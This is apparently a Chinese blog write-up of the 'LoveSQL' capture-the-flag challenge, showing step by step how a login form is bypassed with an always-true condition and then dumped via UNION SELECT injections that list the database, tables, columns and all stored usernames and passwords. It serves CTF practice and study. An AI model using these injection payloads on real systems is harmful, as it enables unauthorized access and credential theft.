[极客大挑战 2019]LoveSQL --不会编程的崽

说实在的,我挖出过的第一个真实漏洞就是sql漏洞。但是ctf我最讨厌的也是sql漏洞。sql花样太多了,各种注入,过滤,哎。。。这也是我为什么一直没做sql题目的原因。但是既然选择玩ctf,还是要硬着头皮上,先来个简单的当做复习吧。

已经知道这是sql的题目了,直接注入吧。

sql第一步肯定要知道是否存在过滤的。这题是入门级别,没过滤啥东西。然后尝试闭合符号,而且这种登录框,一定要尝试万能密码 。

复制代码
123' or 1=1#

如果使用双引号则返回错误。单引号闭合成功。这里也不能用'--+'注释后面的单引号。以后的sql都尝试一下就即可知道用哪个

给了我密码,最初以为是md5值,其实就是单纯的长密码QAQ。为什么要给admin的密码呢?我也不知道有什么用。。。反正我实验了一下,名字与密码都能注入,不管对错。。。我选择在密码里注入

接下来就直接看步骤吧

复制代码
1' order by 4#
复制代码
1' order by 3#

暴点

复制代码
1' union select 1,2,3#

查询数据库名称

复制代码
1' union select 1,database(),3#

查询表名

复制代码
1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='geek'#

查询列名

复制代码
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l0ve1ysq1'#

查询表里数据

复制代码
1' union select 1,group_concat(username),group_concat(password) from l0ve1ysq1#

这是最基础的mysql注入,如果不知道为什么这么构造payload简易学一下,不然很多东西看着还是很突兀的。还有就是最后一步**一定要加上group_concat()**以回显所有数据,因为表里边的数据很多,如果不加上只会回显第一行数据。

已经看见flag了,右键源代码复制粘贴即可

相关推荐
用户9623779544820 小时前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机1 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机1 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954481 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star1 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954481 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher3 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行6 天前
网络安全总结
安全·web安全
red1giant_star6 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
ZeroNews内网穿透6 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全